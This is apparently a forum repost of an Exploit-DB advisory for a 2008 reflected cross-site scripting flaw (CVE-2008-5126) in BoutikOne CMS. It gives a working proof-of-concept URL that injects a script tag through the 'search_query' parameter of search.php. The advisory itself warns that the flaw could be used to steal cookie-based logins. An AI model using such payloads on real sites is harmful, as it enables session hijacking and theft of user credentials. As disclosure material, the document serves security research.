Exploit BoutikOne CMS - 'search_query' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32588
Проверка EDB
  1. Пройдено
Автор
D3V1L
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5126
Дата публикации
2008-11-17
Код:
source: https://www.securityfocus.com/bid/32321/info

BoutikOne CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/search.php?lang=1&sort=Ref&search_query='"></title><script>alert(1337)</script>><marquee><h1>XSS</h1></marquee>
 
Источник
www.exploit-db.com

Похожие темы